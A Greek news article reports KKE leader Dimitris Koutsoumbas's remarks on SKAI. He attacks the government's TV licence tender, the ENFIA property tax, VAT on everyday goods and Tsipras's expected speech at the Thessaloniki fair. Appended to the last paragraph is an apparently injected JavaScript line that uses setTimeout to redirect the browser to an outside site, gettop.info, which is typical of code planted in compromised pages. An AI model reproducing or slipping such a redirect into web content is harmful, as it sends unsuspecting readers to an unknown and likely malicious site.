Κουτσούμπας για άδειες: Παραβίαση της στοιχειώδους νοημοσύνης του λαού

0
5

 

«Ο στόχος της κυβέρνησης με το διαγωνισμό για τις τηλεοπτικές άδειες ήταν να δημιουργήσει ένα πιο φιλικό για αυτήν περιβάλλον», δήλωσε στον ΣΚΑΪ ο γενικός γραματέας του ΚΚΕ Δημήτρης Κουτσούμπας, εκφράζοντας παράλληλα την αγωνία του για τους χιλιάδες εργαζομένους που μένουν στον αέρα.

«Η διαδικασία που ακολούθησε η κυβέρνηση για τις τηλεοπτικές άδειες ήταν μια παραβίαση της στοιχειώδους νοημοσύνης του ελληνικού λαού, ήταν πολύ κακό για το τίποτα και μία από τα ίδια στην καλύτερη περίπτωση», δήλωσε χαρακτηριστικά ο κ Κουτσούμπας.

Σημείωσε ότι το ραδιοτηλεοπτικό τοπίο γίνεται ακόμη πιο ανασφαλές, δεν μπήκε καμία τάξη, έγινε απλά αναδιανομή της πίτας.

Ο κ. Κουτσούμπας τόνισε ότι θα διογκωθεί η ανεργία που ήδη υπάρχει στον κλάδο και πρέπει να εξασφαλιστούν τα δεδουλευμένα στους εργαζομένους στους τηλεοπτικούς σταθμούς που δεν πήραν άδεια. Οι εργαζόμενοι στα μέσα είναι όπως σε όλους τους άλλους τομείς, είπε ο κ Κουτσούμπας.

Ο κ. Κουτσούμπας σημείωσε πως φοροαφαίμαξη των λαϊκών στρωμάτων, καθώς κυρίως τους έμμεσους φόρους πληρώνει η λαϊκή οικογένεια, η μείωση συντάξεων και άλλα αντιλαϊκά μέτρα θα συνεχιστούν και υπεύθυνο γι’ αυτό δεν είναι μόνο το μνημόνιο, αλλά και η πολιτική της κυβέρνησης που οδηγεί στα τάρταρα τον ελληνικό λαό.

«Η κυβέρνηση και ο πρωθυπουργός έχουν εντολή να κάνουν την βρώμικη δουλειά, (να υλοποιήσουν) ότι δεν έκαναν οι προηγούμενοι» πρόσθεσε χαρακτηριστικά, υπογραμμίζοντας ότι «ο ελληνικός λαός πρέπει να ανασκουμπωθεί«.

Χαρακτήρισε τον ΕΝΦΙΑ «αισχρό και βάρβαρο φόρο», και πρόσθεσε ότι δεν βελτιώνεται, αλλά μόνο καταργείται.

Σε ό,τι αφορά τον ΦΠΑ, πρότεινε την κατάργησή του σε είδη πλατιάς κατανάλωσης και υπενθύμισε ότι ενώ το ΚΚΕ είχε προτείνει, καταθέτοντας σχετική πρόταση νόμου «μηδενικό φόρο σε 20 είδη καθημερινότητας», εντούτοις τόσο αυτή η πρόταση, όσο και άλλες που έχει καταθέσει το ΚΚΕ, «ελάχιστες εκ των οποίων έρχονται στην βουλή, καθώς η κυβέρνηση τις κρατά στα συρτάρια«, καταψηφίστηκε «από τους 153 της κυβερνητικής πλειοψηφίας».

Ενόψει της παρουσίας του πρωθυπουργού στη ΔΕΘ, ο κ. Κουτσούμπας είπε ότι το μήνυμα του κ. Τσίπρα «επί της ουσίας θα είναι τίποτα».

Υπενθύμισε ότι από διάφορους πρωθυπουργούς έχουν ακουστεί στην ΔΕΘ υποσχέσεις και μηνύματα που δεν πραγματοποιήθηκαν ποτέ και πρόσθεσε «ο κ. Τσίπρας έχει πάρει τα μαθήματά του, έχει περάσει τις εξετάσεις, από τη ΝΔ και το ΠΑΣΟΚ, γι’ αυτό και τον στηρίζει το κεφάλαιο«. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here